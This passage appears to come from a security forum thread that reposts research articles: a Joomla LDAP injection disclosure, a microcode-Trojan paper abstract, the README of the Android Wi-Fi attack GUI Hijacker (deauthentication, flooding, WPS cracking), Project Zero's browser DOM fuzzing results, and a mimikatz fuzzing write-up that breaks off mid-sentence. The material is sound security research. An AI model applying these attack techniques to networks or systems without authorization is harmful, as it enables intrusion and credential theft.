Joomla! receives many code reviews from the security community. Yet alone one missed security vulnerability in the 500,000 lines of code can lead to a server compromise. With the help of static code analysis, RIPS detected a critical LDAP injection vulnerability (CVE-2017-14596) that remained undiscovered for over 8 years. The vulnerability allows an attacker to steal login credentials from Joomla! installations that use LDAP authentication. We would like to thank the Joomla! Security Strike Team for an excellent coordination and remediation of this issue and recommend to update to the latest Joomla! version 3.8 immediately. More about RIPS Author: Dr. Johannes Dahse CEO, Co-Founder Johannes exploits security vulnerabilities in PHP code for 10 years. He is an active speaker at academic and industry conferences and a recognized expert in this field. He achieved his Ph.D. in IT security / static code analysis at the Ruhr-University Bochum, Germany. Previously, he worked as a security consultant for leading companies worldwide. Sursa: https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
  11. USENIX Publicat pe 15 sept. 2017 Philipp Koppe, Benjamin Kollenda, Marc Fyrbiak, Christian Kison, Robert Gawlik, Christof Paar, and Thorsten Holz, Ruhr-University Bochum Microcode is an abstraction layer on top of the physical components of a CPU and present in most general-purpose CPUs today. In addition to facilitate complex and vast instruction sets, it also provides an update mechanism that allows CPUs to be patched in-place without requiring any special hardware. While it is well-known that CPUs are regularly updated with this mechanism, very little is known about its inner workings given that microcode and the update mechanism are proprietary and have not been throughly analyzed yet. In this paper, we reverse engineer the microcode semantics and inner workings of its update mechanism of conventional COTS CPUs on the example of AMD’s K8 and K10 microarchitectures. Furthermore, we demonstrate how to develop custom microcode updates. We describe the microcode semantics and additionally present a set of microprograms that demonstrate the possibilities offered by this technology. To this end, our microprograms range from CPU-assisted instrumentation to microcoded Trojans that can even be reached from within a web browser and enable remote code execution and cryptographic implementation attacks. View the full program: https://www.usenix.org/sec17/program
  12. Hijacker Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses. This application requires an ARM android device with a wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 chipset (MSM8974, such as Xperia Z2, LG G2 etc) will work with Nexmon (it also supports some other chipsets). Devices that use BCM4330 can use bcmon. An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable. The required tools are included for armv7l and aarch64 devices as of version 1.1. The Nexmon driver and management utility for BCM4339 are also included. Root is also necessary, as these tools need root to work. Features Information Gathering View a list of access points and stations (clients) around you (even hidden ones) View the activity of a specific network (by measuring beacons and data packets) and its clients Statistics about access points and stations See the manufacturer of a device (AP or station) from the OUI database See the signal power of devices and filter the ones that are closer to you Save captured packets in .cap file Attacks Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target) Deauthenticate a specific client from the network it's connected MDK3 Beacon Flooding with custom options and SSID list MDK3 Authentication DoS for a specific network or to everyone Capture a WPA handshake or gather IVs to crack a WEP network Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter) Other Leave the app running in the background, optionally with a notification Copy commands or MAC addresses to clipboard Includes the required tools, no need for manual installation Includes the nexmon driver and management utility for BCM4339 devices Set commands to enable and disable monitor mode automatically Crack .cap files with a custom wordlist Create custom actions and run them on an access point or a client easily Sort and filter Access Points with many parameters Export all the gathered information to a file Add an alias to a device (by MAC) for easier identification More Screenshots Installation Make sure: you are on Android 5+ you are rooted (SuperSU is required, if you are on CM/LineageOS install SuperSU) have a firmware to support Monitor Mode on your wireless interface Download the latest version here. When you run Hijacker for the first time, you will be asked whether you want to install the nexmon firmware or go to home screen. If you have installed your firmware or use an external adapter, you can just go to the home screen. Otherwise, click 'Install Nexmon' and follow the instructions. Keep in mind that on some devices, changing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the firmware you will land on the home screen and airodump will start. Make sure you have enabled your WiFi and it's in monitor mode. Troubleshooting This app is designed and tested for ARM devices. All the binaries included are compiled for that architecture and will not work on anything else. You can check by going to settings: if you have the option to install nexmon, then you are on the correct architecture, otherwise you will have to install all the tools manually (busybox, aircrack-ng suite, mdk3, reaver, wireless tools, libfakeioctl.so library) and set the 'Prefix' option for the tools to preload the library they need. In settings, there is an option to test the tools. If something fails, then you can click 'Copy test command' and select the tool that fails. This will copy a test command to your clipboard, which you can run in a terminal and see what's wrong. If all the tests pass and you still have a problem, feel free to open an issue here to fix it, or use the 'Send feedback' feature of the app in settings. If the app happens to crash, a new activity will start which will generate a report in your external storage and give you the option to send it directly or by email. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file in your external storage directory. The part with the most important information is shown in the activity. Please do not report bugs for devices that are not supported or when you are using an outdated version. Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, you should be getting the results you want. Also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on your network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected. Warning Legal It is highly illegal to use this application against networks for which you don't have permission. You can use it only on YOUR network or a network that you are authorized to. Using a software that uses a network adapter in promiscuous mode may be considered illegal even without actively using it against someone, and don't think for a second it's untracable. I am not responsible for how you use this application and any damages you may cause. Device The app gives you the option to install the nexmon firmware on your device. Even though the app performs a chipset check, you have the option to override it, if you believe that your device has the BCM4339 wireless adapter. However, installing a custom firmware intended for BCM4339 on a different chipset can possibly damage your device (and I mean hardware, not something that is fixable with factory reset). I am not responsible for any damage caused to your device by this software. Consider yourself warned. Donate If you like my work, you can buy me a beer. Sursa: https://github.com/chrisk44/Hijacker
      • 2
      • Like
      • Upvote
  13. Thursday, September 21, 2017 The Great DOM Fuzz-off of 2017 Posted by Ivan Fratric, Project Zero Introduction Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs. An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure. As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing. The fuzzer For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing. We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions. The fuzzer consists of several parts: The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing. The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part. A set of grammars for generating HTML, CSS and JavaScript code. One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach: I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property. Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as: Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs. Instead of going into much technical details here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I would invite community contributions that would cover the areas I might have missed in the fuzzer or grammar creation. Setup We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100.000.000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100.000.000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the pay range of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptable VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run. Here are additional details of the fuzzing setup for each browser: Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds. Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build. Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues. Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing. Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac. Results Without further ado, the number of security bugs found in each browsers are captured in the table below. Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release). Vendor Browser Engine Number of Bugs Project Zero Bug IDs Google Chrome Blink 2 994, 1024 Mozilla Firefox Gecko 4* 1130, 1155, 1160, 1185 Microsoft Internet Explorer Trident 4 1011, 1076, 1118, 1233 Microsoft Edge EdgeHtml 6 1011, 1254, 1255, 1264, 1301, 1309 Apple Safari WebKit 17 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250 Total 31** *While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers **The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here. As can be seen in the table most browsers did relatively well in the experiment with only a couple of security relevant crashes found. Since using the same methodology used to result in significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another. However, Apple Safari is a clear outlier in the experiment with significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago, they were using the same DOM engine (WebKit). It appears that after the Blink/Webkit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit. It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of an useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it! When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as presence and security of a sandbox, bugs in other components such as scripting engines etc. I can also not disregard the possibility that, within DOM, my fuzzer is more capable at finding certain types of issues than other, which might have an effect on the overall stats. Experimenting with coverage-guided DOM fuzzing Since coverage-guided fuzzing seems to produce very good results in other areas we wanted to combine it with the DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and used a modified WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows: The fuzzer generates a new set of samples by mutating existing samples in the corpus. The fuzzer spawns IE process which opens a harness HTML page. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus. Go to step 3 until all samples are executed or the IE process crashes Periodically minimize the corpus using the AFL’s cmin algorithm. Go to step 1. The following set of mutations was used to produce new samples from the existing ones: Adding new CSS rules Adding new properties to the existing CSS rules Adding new HTML elements Adding new properties to the existing HTML elements Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them. Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way. Conclusion As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture. The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts. Posted by Ben at 9:35 AM Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
  14. HACK THE HACKER – FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY) On 22. Sep In this blogpost, I want to explain two topics from a theoretical and practical point of view: How to fuzz windows binaries with source code available (this part is for developers) and How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical) Since this blog post got too long and I didn’t want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws you can jump to chapter “Practice: Analysis of the identified crashes“. I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers and therefore I wanted to test different approaches to fuzz windows applications where source code is available (the audience are most likely developers). To my knowledge there are several blog posts talking about fuzzing Linux applications with AFL or libfuzzer (just compile the application with afl-gcc instead of gcc or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development and therefore all developers should know how to do it correctly and that such a setup can be simple and fast! WHY I CHOSE MIMIKATZ AS FUZZING TARGET To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz because it’s an extremely useful tool for security consultants (and hackers) and I always wanted to understand how mimikatz internally works. Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged on users, machine certificates and many other things. Moreover, mimikatz contains over 261 000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy gentilkiwi, the author of mimikatz. The next thing I need is a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger the vulnerability? Mimikatz can be used to dump cleartext credentials and hashes of currently logged in users from the LSASS process. But if there exists a bug in the parsing code of mimikatz, what exactly could I achieve with this? I could just exploit myself because mimikatz gets executed on the same system. Well, not always. As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it’s nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kind of alerts (AntiVirus, Application Whitelisting, Windows Logs, …) and because we want to stay under the radar, we don’t want these alerts. Instead, we can use Microsoft signed binaries to dump the LSASS process (e.g.: Task manager, procdump.exe, msbuild.exe or sqldumper.exe). Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system reading our manipulated memory dump file and watch reverse shells coming in! This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/). To be fair, exploiting this scenario can be quite difficult because mimikatz is compiled with protections, such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we don’t have the luxury of a remote memory leak nor of scripting possibilities such as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible, for example see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP). THEORY: FUZZING WINDOWS BINARIES We don’t want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on), instead, we want to use something which is called “coverage-guided fuzzing” (or feedback-based fuzzing). This means we want to extract code coverage information during fuzzing. If one of our mutated input files (the memory dump files) generate more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths itself (ideally all) for us and therefore “learn” all the internal parsing logic autonomously! This also means that we only have to write a fuzzer one time and can use it against nearly all kinds of applications! Luckily for us, we don’t even have to write such a fuzzer because someone else already did an excellent job! Currently the most commonly used fuzzer is called AFL (American fuzzy lop) and implements exactly this idea. It turned out that AFL is extremely effective in identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL: It is extremely fast. It extracts edge coverage (with hit count) and not only code coverage which simplified means that we try to maximize executed “paths” and not “code” (E.g. if we have an IF statement, code coverage would put the input file which executes the code inside the IF into the queue. Edge coverage on the other side would put one entry with, and one entry without the IF body-code into the queue.). Because of 1) it can implement deterministic mutation (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing. It’s extremely simple to use. Fuzzing can be started within several minutes! The big question is now: How does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to “hack” generated object files from gcc and insert at all possible code locations instrumentation code. There is also a LLVM mode where a LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode if source code is not available which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL). Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can dynamically instrument (during runtime) the target binary which means that a dispatcher loads the next instructions which should be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while being completely transparent to the target application. This is quite complicated but the framework hides all that logic from the user. Obviously, this approach is not fast (but works on Windows and has many cool features for the future!). When source code is available, I thought that there should be the same possibility as AFL does on Linux (with GCC). My first attempt was to use “libfuzzer” on Windows. Libfuzzer is a fuzzer like AFL but it acts on function level fuzzing and is therefore more suitable for developers. AFL fuzzes full binaries per default but can also be started in a persistent mode where it fuzzes on function level. Libfuzzer uses the feature “Source-based code coverage” from the LLVM clang compiler which is exactly what I wanted to use for coverage-information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for “source-based code coverage” I got again some errors which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more a pain than anything else, I didn’t pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future! The next thing I tested was WinAFL in syzygy mode and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel 0vercl0k Souchet (developer of the syzygy mode) for their amazing job and of course Michal Zalewski for AFL! PRACTICE: FUZZING WINDOWS BINARIES You can download WinAFL from here: https://github.com/ivanfratric/winafl All we must do is include the header and add the code: While(__afl_persistent_loop()) { // code to fuzz } to the project which we want to fuzz and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile). For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc,argc) because I wanted to directly dump the hashes/passwords from the minidump (issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would extract this information per default from the LSASS process I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { kuhl_m_sekurlsa_reset(); // sekurlsa::minidump command pMinidumpName = argv[1]; // sekurlsa::minidump command kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); // sekurlsa::logonpasswords command } Return NT_SUCCESS; } Hint: Do not use the above code during fuzzing. I added a subtle flaw, which I’m going to explain later. Can you already spot it? After compilation, we can start the binary and see some additional messages: The next step is to instrument the code. For this to work we must register “msdia140.dll”. This can be done via the command: Regsvr32 C:\path\to\msdia140.dll Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb file to add the instrumentation: We can start the instrumented binary and see the adapted status message: Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used task manager to dump the LSASS process), put it into the input directory and start fuzzing: As we can see, we have a file size problem! THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall, that AFL is doing deterministic fuzzing before switching to random fuzzing for each queue input. That means that it is doing specific bit and byte flips/additions/removals/… for every (!) byte/bit in the input! This includes several strategies like bitflip 1/1, bitflip 2/1, …, arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then walks forward 1 bit to flip the next bit. Whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 and that AFL tries to add interesting values to a value treated as 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depend on the file size! Let’s just assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means that we must execute the target application exactly input-filesize (bit) number of times. WinAFL is doing in-memory fuzzing which means that we don’t have to start the application every time, but let’s forget this for now so that our discussion does not get too complicated. Let’s say that our input binary has a size of 10 kB. That are 81920 required executions for the deterministic stage (only for bitflip 1/1)! AFL conducts many more deterministic strategies. For AFL on Linux this is not very huge, it’s not uncommon to get execution speeds of 1000 – 8000 executions / second (because of the fork-server, persistent-mode, …) per core. This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores we can easily do this strategy for one input file within a second. Now let’s assume that our input has a size of 1 MB (AFL limit), which means 8 388 608 required executions for the bitflip 1/1 and that our target application is a little bit slower because it’s bigger and running on Windows (200 exec / sec) and that we just have one core available for fuzzing. Then we need 11,5 hours only to finish the bitflip 1/1 for one input entry! Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again! It’s not uncommon that the queue grows up to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. And in our case the input (memory dump) has a size of 27 MB! This would be 216 036 224 required executions only for bitflip 1/1. AFL detects this and directly aborts because this would just take too long (and AFL would never find vulnerabilities because it’s stuck inside deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good because we still have to find the special byte/bit flip which triggers the vulnerability. And the likelihood for this in such a big input file is not very high…. Here is a cite from Michal Zalewski (author of AFL) from the perf_tips.txt document: To illustrate, let’s say that you’re randomly flipping bits in a file, one bit at a time. Let’s assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs – not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%. The key learning is that input file size is very important during fuzzing! At least as important as plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don’t want to talk about them in this blog post. They shrink files via a fuzzing attempt and since the problem is NP-hard they use heuristics. Tmin is also very slow (execution time depends on the file size…) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex and I don’t want to “waste” time while WinAFL identifies the format. And here is where heatmaps come into play. PRACTICE: FUZZING AND HEATMAPS My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern-search, however, mimikatz parses and uses lots of structures and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don’t want to understand the application to write a specific fuzzer, instead we want that the fuzzer learns everything itself. If we could somehow give the fuzzer the same ability to detect the “important input bytes”… During reading the code I identified something interesting. Mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that it reads nearly all required information from there (sometimes it also copies it via kull_m_minidump_copy, but let’s not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can easily reduce the number of required executions drastically! If mimikatz does not touch a specific memory region, why should we even fuzz the bytes there? Here is a heat map which I generated based on memory read operations from mimikatz on my 27 MB input file (generated via a plotly python script): The black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the left bottom of the picture. I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes and so on. At this zoom level, we do not see access attempts to the start (header) of the memory dump. However, this is only because the file size is 27 MB and therefore the smaller red/yellow/white dots are not visible. But we can zoom in: The most important message from the above pictures: We do not have to fuzz the bytes from the black area! But we can even do better, we can start fuzzing the white bytes (many read attempts, like offset 0xaa00 which gets read several thousand times), then continue with yellow bytes (e.g.: offset 0x08 is read several hundred times) and then red areas (which are only read 1-5 times). This itself is not a perfect approach (more read attempts also mean that the likelihood that the input becomes invalid gets higher and therefore it’s maybe not the best idea to start with white areas but since we must do the full deterministic step it basically does not matter with which offsets we start; Hint: A better strategy is to also consider the triggering read-instruction address together with the hitcounts). You are maybe wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script, however, I’m currently developing a more sophisticated script with the use of dynamic instrumentation frameworks which can extract such information from any application. The use of a debugger script is “stupid” because it’s very slow and does not work for every application. However, for mimikatz it worked fine because mimikatz reads most of the time from the region which is mapped via MapViewOfFile(). My WinAppDbg script is very simple, I just use the Api-Hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded. I placed a memory breakpoint on it and at every breakpoint hit I just log the relative offset and increment the hit counter. You can also extend this script to become more complex (e.g.: hook kull_m_memory_search() or kull_m_minidump_copy(). For reference, here is the script: We start mimikatz via the debugger, as soon as mimikatz finishes (debug.loop() returns), we just sort the offsets based on the hit counts and dump them to a log file. This is the code which hooks MapViewOfFile to obtain the base address of our input in-memory. This code also adds the memory breakpoint (watch_buffer() method) and invokes memory_breakpoint_callback every time an instruction reads from our input. Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script should be extended (e.g. to disable the memory breakpoint for search-functions), the WinAppDbg source must be modified to return the “bw” variable in the watch_buffer() function. All left is the callback function: I used capstone to disassemble the triggering instruction to obtain the size of the read operation to update the offsets correctly. As you can see, there is no magic involved and the script is really simple (at least this one which only works with mimikatz). The downside of the debugger memory breakpoint approach is that it is extremely slow. On my test system, this script executes approximately 30 minutes to execute mimikatz one time which is really slow (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another down-side is that it does not work for all applications because typically applications copy input-bytes to other buffers and access them there. A more general approach is to write such a script with a dynamic instrumentation framework which is also much faster (on which I’m currently working on). Developing such a script is much harder because we have to use shadow memory for taint tracking, follow copies of tainted memory (this taint propagation is a complex part because it requires correct semantic understanding of the x86 instruction set) but store at the same time which byte depends on which input byte and this should be as fast as possible (for fuzzing) and does not consume too much memory (so it’s useable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similiar solutions, most notable TaintScope (however, no source code or tool public available and it was just a PoC) or VUzzer (based on DataTracker/libdft which themself are based on PIN) and some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either source code and the tool is not public available, or it is very slow or it does not work on Windows or it does not propagate the file offset information (just marks data is tainted or not tainted) or they are written with PIN which itself is slower than DynamoRio. I’m developing my own tool here to fulfil the above mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with Tmin, which also tries to reduce the input file size. However, it does this via a fuzzy approach which is very slow (and can’t handle checksums and file offsets so well). We can also verify that the black bytes don’t matter by just removing (zeroing them out) from the input file: The above figure shows that the output of both files is exactly the same, therefore the black bytes really don’t matter. Now we can start fuzzing with a much smaller input file – only 91KB instead of 27MB! PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN I first started a simple fuzzer (not WinAFL) because I first had to modify the WinAFL code to only fuzz the identified bytes. I recommend to start fuzzing as soon as possible with a simple fuzzer and while it is running work on a better version of the fuzzer. My first fuzzer was a 50 LoC python script which flipped bytes, invoked mimikatz over WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12 